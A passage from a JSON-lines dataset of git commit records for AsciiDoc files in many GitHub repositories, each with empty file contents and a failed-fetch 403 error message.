'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f92fdc88463b41fd62c8fac1bab41a12c809942","subject":"Added documentation about BAM key","message":"Added documentation about BAM key\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Background Activity Moderator key.asciidoc","new_file":"documentation\/Background Activity Moderator key.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51fc8c0df5c2ff44fa6427f7d1dc9e5ede205a4a","subject":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","message":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26b54fecb92ff5f53fd258c656f35a6879917e5b","subject":"README with instructions on using AsciiDoc and Markdown","message":"README with instructions on using AsciiDoc and Markdown\n","repos":"UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources","old_file":"Development-Guide\/AsciiDoc-and-Markdown-Guide\/README.adoc","new_file":"Development-Guide\/AsciiDoc-and-Markdown-Guide\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/UCSolarCarTeam\/Recruit-Resources.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"805362c240c6689052b09b970ed9883738edc6d7","subject":"change some lines","message":"change some lines\n","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2019-04-07-IPSec S2S - From Azure Stack to Mikrotik.adoc","new_file":"_posts\/2019-04-07-IPSec S2S - From Azure Stack to Mikrotik.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4dd382901906db8edb0d25049eab4d2406fbea20","subject":"CAMEL-14551 - Create an AWS-SES component based on SDK v2, regen docs","message":"CAMEL-14551 - Create an AWS-SES component based on SDK v2, regen docs\n","repos":"nicolaferraro\/camel,tdiesler\/camel,zregvart\/camel,zregvart\/camel,apache\/camel,nikhilvibhav\/camel,gnodet\/camel,pax95\/camel,tadayosi\/camel,tadayosi\/camel,pax95\/camel,christophd\/camel,christophd\/camel,cunningt\/camel,tdiesler\/camel,adessaigne\/camel,alvinkwekel\/camel,tadayosi\/camel,pmoerenhout\/camel,christophd\/camel,cunningt\/camel,apache\/camel,cunningt\/camel,christophd\/camel,apache\/camel,tdiesler\/camel,alvinkwekel\/camel,adessaigne\/camel,gnodet\/camel,adessaigne\/camel,nikhilvibhav\/camel,adessaigne\/camel,tadayosi\/camel,zregvart\/camel,DariusX\/camel,alvinkwekel\/camel,tadayosi\/camel,christophd\/camel,ullgren\/camel,DariusX\/camel,tdiesler\/camel,cunningt\/camel,gnodet\/camel,mcollovati\/camel,adessaigne\/camel,nikhilvibhav\/camel,mcollovati\/camel,pax95\/camel,gnodet\/camel,cunningt\/camel,pax95\/camel,pmoerenhout\/camel,adessaigne\/camel,pmoerenhout\/camel,nicolaferraro\/camel,gnodet\/camel,mcollovati\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,DariusX\/camel,zregvart\/camel,ullgren\/camel,apache\/camel,mcollovati\/camel,christophd\/camel,ullgren\/camel,pmoerenhout\/camel,apache\/camel,DariusX\/camel,tadayosi\/camel,pax95\/camel,tdiesler\/camel,pmoerenhout\/camel,ullgren\/camel,tdiesler\/camel,pmoerenhout\/camel,alvinkwekel\/camel,apache\/camel,cunningt\/camel,pax95\/camel,nicolaferraro\/camel","old_file":"components\/camel-aws2-ses\/src\/main\/docs\/aws2-ses-component.adoc","new_file":"components\/camel-aws2-ses\/src\/main\/docs\/aws2-ses-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b75f9d9b53c671c3a8941baf7484d0b7965dcf91","subject":"Update 2015-04-28-hello.adoc","message":"Update 2015-04-28-hello.adoc","repos":"therebelrobot\/blog-n.ode.rocks,therebelrobot\/blog-n.ode.rocks,therebelrobot\/blog-n.ode.rocks","old_file":"_posts\/2015-04-28-hello.adoc","new_file":"_posts\/2015-04-28-hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/therebelrobot\/blog-n.ode.rocks.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71bc949fd5b084d84973328d3c369510b554d5b2","subject":"Create 2016-06-19-Hello.adoc","message":"Create 2016-06-19-Hello.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2016-06-19-Hello.adoc","new_file":"_posts\/2016-06-19-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3599444ac0c97a9e5c45651d471ff9dd90bef9df","subject":"Update 2015-12-24-Write-the-f-docs.adoc","message":"Update 2015-12-24-Write-the-f-docs.adoc","repos":"smirnoffs\/smirnoffs.github.io,smirnoffs\/smirnoffs.github.io,smirnoffs\/smirnoffs.github.io","old_file":"_posts\/2015-12-24-Write-the-f-docs.adoc","new_file":"_posts\/2015-12-24-Write-the-f-docs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smirnoffs\/smirnoffs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d0e6d455adcaa427a5105929f94330c49e6c317","subject":"Update 2016-01-04-Java-8-in-action.adoc","message":"Update 2016-01-04-Java-8-in-action.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-Java-8-in-action.adoc","new_file":"_posts\/2016-01-04-Java-8-in-action.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0947b38ac8da3b6f759141fdf8c4bd8a5a2d7c9d","subject":"Update 2016-02-07-Install-Logstash.adoc","message":"Update 2016-02-07-Install-Logstash.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2016-02-07-Install-Logstash.adoc","new_file":"_posts\/2016-02-07-Install-Logstash.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34a37df0c8471cd5e47e32bd17ceaa3c968f8824","subject":"Update 2016-10-02-My-English-Title.adoc","message":"Update 2016-10-02-My-English-Title.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"_posts\/2016-10-02-My-English-Title.adoc","new_file":"_posts\/2016-10-02-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ff9ac56fb1fb5d38fcae59c587c76f85dbc2335","subject":"Update 2017-02-14-why-I-bake-bread.adoc","message":"Update 2017-02-14-why-I-bake-bread.adoc","repos":"thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io","old_file":"_posts\/2017-02-14-why-I-bake-bread.adoc","new_file":"_posts\/2017-02-14-why-I-bake-bread.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomaszahr\/thomaszahr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59cf41637c8f0ab0977be0f2104d058fff0f5580","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/on_reading.adoc","new_file":"content\/writings\/on_reading.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"26019b6625f2a5340dd67f04d9919950925e5518","subject":"Update 2015-12-14-AB-testing.adoc","message":"Update 2015-12-14-AB-testing.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-14-AB-testing.adoc","new_file":"_posts\/2015-12-14-AB-testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35541c99b816245e53361f31e17164d37c0801ff","subject":"Update 2016-10-12-hubpress-r.adoc","message":"Update 2016-10-12-hubpress-r.adoc","repos":"pokev25\/pokev25.github.io,pokev25\/pokev25.github.io,pokev25\/pokev25.github.io,pokev25\/pokev25.github.io","old_file":"_posts\/2016-10-12-hubpress-r.adoc","new_file":"_posts\/2016-10-12-hubpress-r.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pokev25\/pokev25.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd32204ca170ca451e46663f389c7b7358754fe6","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f6d1283553fef5cd135d48e304cad0cdfd9e907","subject":"Update 2016-04-21-.adoc","message":"Update 2016-04-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-21-.adoc","new_file":"_posts\/2016-04-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb06095c2b5822c06a57890764b01c3e2f91802b","subject":"Update 2016-07-05-slack-book-event.adoc","message":"Update 2016-07-05-slack-book-event.adoc","repos":"KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io","old_file":"_posts\/2016-07-05-slack-book-event.adoc","new_file":"_posts\/2016-07-05-slack-book-event.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KozytyPress\/kozytypress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0b48cc8b71921b1cb7603f337e35998438a7d6c","subject":"Update 2017-02-24-Google-Extension.adoc","message":"Update 2017-02-24-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extension.adoc","new_file":"_posts\/2017-02-24-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62793fb9e2d9a448c43dcc65029c1bb0ecfb9f51","subject":"updated Changelog","message":"updated Changelog\n","repos":"sdaschner\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer,cthiebaud\/jaxrs-analyzer","old_file":"Changelog.adoc","new_file":"Changelog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cthiebaud\/jaxrs-analyzer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"732c2903d32da21e3d4cfb2a26bfdbf2db19a65f","subject":"Update README","message":"Update README\n","repos":"pjanouch\/sdtui,pjanouch\/sdtui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/sdtui.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"cc0b3639afd9e617ba908582d3b0ed9c2eb87f61","subject":"Python note: Retriving path for a module","message":"Python note: Retriving path for a module\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"404c1a4072499f5743915e827ccb55ddbd6f30c2","subject":":memo: Close #4: README","message":":memo: Close #4: README\n","repos":"ljacomet\/terracotta-platform,chrisdennis\/terracotta-platform,Terracotta-OSS\/terracotta-platform,anthonydahanne\/terracotta-platform,Terracotta-OSS\/terracotta-platform,albinsuresh\/terracotta-platform,lorban\/terracotta-platform,mathieucarbou\/terracotta-platform,AbfrmBlr\/terracotta-platform,anthonydahanne\/terracotta-platform,albinsuresh\/terracotta-platform,chrisdennis\/terracotta-platform,ljacomet\/terracotta-platform,rkavanap\/terracotta-platform,jd0-sag\/terracotta-platform","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chrisdennis\/terracotta-platform.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e1ec59043ebb32e1e5f0c5821f3ecb33e4b0ced0","subject":"Update README","message":"Update README\n","repos":"pjanouch\/ell","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/ell.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"fdd66fe87387b27e456128dd627bba7373cff84e","subject":"Init doc","message":"Init doc\n","repos":"mgreau\/docker4dev-tennistour-app,mgreau\/docker4dev-tennistour-app,mgreau\/docker4dev-tennistour-app","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/docker4dev-tennistour-app.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9eb47de7e3ae7da8db149e3683a3ad7e1ac3c26","subject":"Update README","message":"Update README\n","repos":"pjanouch\/sdtui,pjanouch\/sdtui","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/sdtui.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"2023e29a38a381ddb2a383d67c80267a69198d8e","subject":"README.adoc gets link to API.adoc","message":"README.adoc gets link to API.adoc","repos":"sirjorj\/libxwing","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sirjorj\/libxwing.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"4fa98abec391fd03e11ec404d819b2bd5584e854","subject":"Figure out bash","message":"Figure out bash\n","repos":"pjanouch\/sdn","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/sdn.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"cae762d46dfb22d8a1afa77445a1f8b97b1a8315","subject":"Update Tomcat instructions","message":"Update Tomcat instructions\n","repos":"prateepb\/spiracle,waratek\/spiracle,waratek\/spiracle,waratek\/spiracle,prateepb\/spiracle,prateepb\/spiracle","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateepb\/spiracle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a334e95516b0444789daf94cc1bba91f0a49d0ab","subject":"Add README","message":"Add README\n","repos":"IanDarwin\/javawebmail,IanDarwin\/javawebmail","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IanDarwin\/javawebmail.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5ba3039bbb9b1f92f0e23b5e4e99afee7fe893a2","subject":"Update roadmap in readme","message":"Update roadmap in readme\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>\n","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f618936de07f30d6f8d15facd7355f6f36333b35","subject":"add README","message":"add README\n","repos":"struberg\/javaConfig","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/struberg\/javaConfig.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"03818265205533b8d62f5134bd6392759bfb19cd","subject":"README","message":"README\n","repos":"iDoka\/eda-scripts,iDoka\/eda-scripts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iDoka\/eda-scripts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bccb00e0bed5432c373f29fe8596ba4aa968edea","subject":"[doc] Add a link to the FAQ (we cannot use includes)","message":"[doc] Add a link to the FAQ (we cannot use includes)\n","repos":"jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a96562b3558454dbd715b177b9d446877fd6a62","subject":"Added README in AsciiDoc format. github supports adoc","message":"Added README in AsciiDoc format. github supports adoc\n","repos":"benignbala\/pod-asciidoctor","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/benignbala\/pod-asciidoctor.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e37d2a7e8133ac75fc64f427351a5145f3b835e","subject":"add readme","message":"add readme\n","repos":"Mikulas\/transpiler,Mikulas\/transpiler","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mikulas\/transpiler.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b6a9cfcf4addc74a012d506975358eefdf63618","subject":"Reformatted README to AsciiDoc.","message":"Reformatted README to AsciiDoc.\n","repos":"Yubico\/libu2f-server,Yubico\/libu2f-server","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/libu2f-server.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"57beb5e26dd003942169e316c8a0b98364d39dac","subject":"removed accidentally included example doc file","message":"removed accidentally included example doc file\n\nSigned-off-by: Dan Mack <f52cae7d677fd8a83ac7cc4406c1d073a69a7b23@macktronics.com>\n","repos":"danmack\/resume","old_file":"example.adoc","new_file":"example.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed58fc7f65ed42d6e452f26d55d230b71cf8d464","subject":"Delete README-es.adoc","message":"Delete README-es.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"README-es.adoc","new_file":"README-es.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bd1ebc0c8aa9ace744c0f02d0a944948e3ced99","subject":"Add myself as contributor","message":"Add myself as contributor\n","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,jakubjab\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain","old_file":"src\/docs\/manual\/05_contributors.adoc","new_file":"src\/docs\/manual\/05_contributors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d99d06e427e8dfc40cce006a667a6092a46bbed","subject":"[README] First version of the asciidoc file.","message":"[README] First version of the asciidoc file.\n\nSigned-off-by: St\u00e9phane Galland <23860b554af9116d4237121086bd6767cdd4ff4b@arakhne.org>\n","repos":"tpiotrow\/afc,DevFactory\/afc,tpiotrow\/afc,tpiotrow\/afc,gallandarakhneorg\/afc,DevFactory\/afc,DevFactory\/afc,tpiotrow\/afc,DevFactory\/afc,gallandarakhneorg\/afc,gallandarakhneorg\/afc,gallandarakhneorg\/afc,gallandarakhneorg\/afc","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tpiotrow\/afc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f402819fbdee311ad1d9a14df6e99339b6037468","subject":"add readme","message":"add readme\n\nasciidoc > markdown\n","repos":"concourse\/turbine","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/concourse\/turbine.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3a22b518435655423d8c396b7f059da3785d7296","subject":"Changed Email address to a github based address","message":"Changed Email address to a github based address\n","repos":"skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces,skaterkamp\/szoo-faces","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skaterkamp\/szoo-faces.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dfabcc7af04b0b447ece7e313016642b5fd58ced","subject":"updated docs to reflect changes to schema mode","message":"updated docs to reflect changes to schema mode\n","repos":"djangonauts\/django-hstore,Stranger6667\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,djangonauts\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,pombredanne\/django-hstore,djangonauts\/django-hstore,pombredanne\/django-hstore,Stranger6667\/django-hstore,Stranger6667\/django-hstore","old_file":"doc\/doc.asciidoc","new_file":"doc\/doc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/djangonauts\/django-hstore.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f99ed31ecc91df3cb284fcaa9bf7fd254f40c7b","subject":"Update 2017-06-30-C-S-S-Because-tuyu.adoc","message":"Update 2017-06-30-C-S-S-Because-tuyu.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-30-C-S-S-Because-tuyu.adoc","new_file":"_posts\/2017-06-30-C-S-S-Because-tuyu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5c8a65ad9f3e99f7c71d4bcb6e939afe8bff8f7","subject":"Update javaee7-websocket-api-html5-en.adoc","message":"Update javaee7-websocket-api-html5-en.adoc","repos":"mgreau\/javaee7-websocket,jthmiranda\/javaee7-websocket,jthmiranda\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket,mgreau\/javaee7-websocket","old_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/javaee7-websocket.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36e46235ed0b1b556a44cdecd3d53dc75c45a8ef","subject":"First check-in of protocol and reverse engineering documentation","message":"First check-in of protocol and reverse engineering documentation\n","repos":"Br3nda\/libfitbit,kalon33\/libfitbit,openyou\/libfitbit","old_file":"doc\/fitbit_protocol.asciidoc","new_file":"doc\/fitbit_protocol.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kalon33\/libfitbit.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"efc62f193f0830c8061a632498c5ac81d1e43c6e","subject":"Docs: fix health response test","message":"Docs: fix health response test\n\nI managed to test the wrong snippet before pushing the last\ncommit.... This fixes the error in it.\n","repos":"naveenhooda2000\/elasticsearch,Stacey-Gammon\/elasticsearch,lks21c\/elasticsearch,maddin2016\/elasticsearch,nezirus\/elasticsearch,lks21c\/elasticsearch,uschindler\/elasticsearch,wangtuo\/elasticsearch,wenpos\/elasticsearch,scorpionvicky\/elasticsearch,winstonewert\/elasticsearch,fred84\/elasticsearch,alexshadow007\/elasticsearch,shreejay\/elasticsearch,nazarewk\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,strapdata\/elassandra,LeoYao\/elasticsearch,masaruh\/elasticsearch,brandonkearby\/elasticsearch,qwerty4030\/elasticsearch,jprante\/elasticsearch,shreejay\/elasticsearch,nazarewk\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,vroyer\/elassandra,nazarewk\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,s1monw\/elasticsearch,gingerwizard\/elasticsearch,alexshadow007\/elasticsearch,pozhidaevak\/elasticsearch,winstonewert\/elasticsearch,alexshadow007\/elasticsearch,strapdata\/elassandra,glefloch\/elasticsearch,markwalkom\/elasticsearch,Stacey-Gammon\/elasticsearch,jimczi\/elasticsearch,naveenhooda2000\/elasticsearch,pozhidaevak\/elasticsearch,uschindler\/elasticsearch,LeoYao\/elasticsearch,umeshdangat\/elasticsearch,mohit\/elasticsearch,glefloch\/elasticsearch,wenpos\/elasticsearch,nezirus\/elasticsearch,jimczi\/elasticsearch,naveenhooda2000\/elasticsearch,masaruh\/elasticsearch,markwalkom\/elasticsearch,sneivandt\/elasticsearch,wenpos\/elasticsearch,glefloch\/elasticsearch,sneivandt\/elasticsearch,robin13\/elasticsearch,nazarewk\/elasticsearch,scottsom\/elasticsearch,mjason3\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nazarewk\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,wangtuo\/elasticsearch,winstonewert\/elasticsearch,LeoYao\/elasticsearch,robin13\/elasticsearch,uschindler\/elast